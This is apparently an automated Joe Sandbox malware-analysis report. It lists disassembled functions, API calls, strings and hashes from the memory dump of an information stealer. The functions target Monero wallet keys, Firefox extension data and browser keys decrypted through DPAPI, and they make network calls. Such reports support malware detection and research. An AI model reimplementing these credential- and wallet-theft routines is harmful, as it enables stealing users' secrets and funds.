Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: b99b5d6f019fa068813f66ce0278b554fa451a7add9894c2ef1883233ca72bc7
Instruction ID: 669cc4400a7ddff8cdea18d6aa38548b1e7c5e513da3cd3eb1cd9f93a97fa8d5
Opcode Fuzzy Hash: b99b5d6f019fa068813f66ce0278b554fa451a7add9894c2ef1883233ca72bc7
Instruction Fuzzy Hash: 64410FB1A11304AFC708DFD8EC95AA977B8FF28302F144229F505D26A1DB345986CB63

Function 0081A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 00828B60: GetSystemTime.KERNEL32(00830E1A,00EF9A98,008305AE,?,?,008113F9,?,0000001A,00830E1A,00000000,?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 00828B86

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0081A3FF
lstrlen.KERNEL32(00000000), ref: 0081A6BC

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

DeleteFileA.KERNEL32(00000000), ref: 0081A743

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 93ac0857e40815c4be6fab99330a1891ce0fb59bbb9b96e382eccf1a7504637f
Instruction ID: e9a4786cfba88bc98aa06d0bad28b7163586b115716c2d3b3743f0035b94d3fb
Opcode Fuzzy Hash: 93ac0857e40815c4be6fab99330a1891ce0fb59bbb9b96e382eccf1a7504637f
Instruction Fuzzy Hash: BDE1D3729101289BDB08EBA8EC96DEE7378FF54300F508569F516F2091DF346A89CB63

Function 0081D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 00828B60: GetSystemTime.KERNEL32(00830E1A,00EF9A98,008305AE,?,?,008113F9,?,0000001A,00830E1A,00000000,?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 00828B86

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D801
lstrlen.KERNEL32(00000000), ref: 0081D99F
lstrlen.KERNEL32(00000000), ref: 0081D9B3
DeleteFileA.KERNEL32(00000000), ref: 0081DA32

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: a8965882970c2afa9ba6955954e1081a2ab363e8293b529f04652cad39b9db9b
Instruction ID: 08603073233947b909ddaea7f76be4eb216cc8d18eda04981593243ced4328dc
Opcode Fuzzy Hash: a8965882970c2afa9ba6955954e1081a2ab363e8293b529f04652cad39b9db9b
Instruction Fuzzy Hash: 9D81D2719101249BDB08EBA8EC96DEE7778FF54300F504529F517E6091EF346A89CBA3

Function 0081F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008199EC
Part of subcall function 008199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819A11
Part of subcall function 008199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00819A31
Part of subcall function 008199C0: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 00819A5A
Part of subcall function 008199C0: LocalFree.KERNEL32(0081148F), ref: 00819A90
Part of subcall function 008199C0: CloseHandle.KERNEL32(000000FF), ref: 00819A9A

Part of subcall function 00828E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828E52

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00831580,00830D92), ref: 0081F54C
lstrlen.KERNEL32(00000000), ref: 0081F56B

Strings

^userContextId=4294967295, xrefs: 0081F59C
moz-extension+++, xrefs: 0081F5AD

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: d8a82b1527a35d4531e246c255dddab20e71a7cabe4788112264dba4346fd6e8
Instruction ID: ef05049f6061819d338927594335bf754194efdd93037db547e0072c933b69b3
Opcode Fuzzy Hash: d8a82b1527a35d4531e246c255dddab20e71a7cabe4788112264dba4346fd6e8
Instruction Fuzzy Hash: EA51E271D101189BDB08FBA8EC96DED7778FF54300F408528F516E6192EE346A89CBA3

Function 00819CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 008199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008199EC
Part of subcall function 008199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819A11
Part of subcall function 008199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00819A31
Part of subcall function 008199C0: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 00819A5A
Part of subcall function 008199C0: LocalFree.KERNEL32(0081148F), ref: 00819A90
Part of subcall function 008199C0: CloseHandle.KERNEL32(000000FF), ref: 00819A9A

Part of subcall function 00828E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00819D39

Part of subcall function 00819AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814EEE,00000000,00000000), ref: 00819AEF
Part of subcall function 00819AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00814EEE,00000000,?), ref: 00819B01
Part of subcall function 00819AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814EEE,00000000,00000000), ref: 00819B2A
Part of subcall function 00819AC0: LocalFree.KERNEL32(?,?,?,?,00814EEE,00000000,?), ref: 00819B3F

Part of subcall function 00819B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00819B84
Part of subcall function 00819B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00819BA3
Part of subcall function 00819B60: LocalFree.KERNEL32(?), ref: 00819BD3

Strings

"encrypted_key":", xrefs: 00819D30
DPAPI, xrefs: 00819D89
, xrefs: 00819DC1

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: da6dc4d8a212db74b6ab7852abde3146b4bef70e22ea157fc3f3686a6fff95b1
Instruction ID: 9ac5ac159710dea380f0d149cee72f0b30da8ff6dcfc022992455bc353df2a7b
Opcode Fuzzy Hash: da6dc4d8a212db74b6ab7852abde3146b4bef70e22ea157fc3f3686a6fff95b1
Instruction Fuzzy Hash: E2310DB5D10209ABCF04DBE8EC95EEFB7B8FF48304F144519E955E6241EB349A44CBA1

Function 00826AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EF8850,?,0083110C,?,00000000,?,00831110,?,00000000,00830AEF), ref: 00826ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826AE8
CloseHandle.KERNEL32(00000000), ref: 00826AF9
Sleep.KERNEL32(00001770), ref: 00826B04
CloseHandle.KERNEL32(?,00000000,?,00EF8850,?,0083110C,?,00000000,?,00831110,?,00000000,00830AEF), ref: 00826B1A
ExitProcess.KERNEL32 ref: 00826B22

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 66a387ec7589ea54df619ad4560c139377cfc755079d9dddb3a07b53d5bb43e7
Instruction ID: 46f3bbc0f650e9d6970a454a02ed5e3d22fdcce30c59707aae773e93a1c1c3d5
Opcode Fuzzy Hash: 66a387ec7589ea54df619ad4560c139377cfc755079d9dddb3a07b53d5bb43e7
Instruction Fuzzy Hash: E1F03A70A40339ABE710EBA0AC06BBD7A74FF24702F104614F503E11C1EBB05581D657

Function 008147B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00814849

Strings

<, xrefs: 008147C9

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 2b35d2121317c675c7f0f778eb5d7e638be4b0da6ac02318df939e66199e014a
Instruction ID: c3d3d2709fa1246697776c46de05bb13464bd3467b67d9abecc2139249458aae
Opcode Fuzzy Hash: 2b35d2121317c675c7f0f778eb5d7e638be4b0da6ac02318df939e66199e014a
Instruction Fuzzy Hash: 4F215EB1D00209ABDF14DFA5EC46ADE7B74FF04320F108625F915A72D0EB706A0ACB82

Function 008251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 00816280: InternetOpenA.WININET(00830DFE,00000001,00000000,00000000,00000000), ref: 008162E1
Part of subcall function 00816280: StrCmpCA.SHLWAPI(?,00EFE270), ref: 00816303
